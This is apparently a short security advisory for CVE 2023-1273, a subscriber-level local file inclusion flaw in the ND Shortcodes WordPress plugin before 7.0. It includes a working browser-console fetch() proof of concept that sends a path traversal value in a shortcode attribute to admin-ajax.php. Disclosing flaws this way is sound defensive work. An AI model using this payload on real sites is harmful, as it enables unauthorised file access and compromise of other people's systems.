ND Shortcodes < 7.0 – Subscriber+ LFI | CVE 2023-1273

Description

The plugin does not validate some shortcode attributes before using them to generate paths passed to include function/s, allowing any authenticated users such as subscriber to perform LFI attacks

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user, this will include the index.php file of the root of the blog

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[nd_options_testimonial nd_options_layout='../../../../../../index']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Numerous shortcodes were affected by this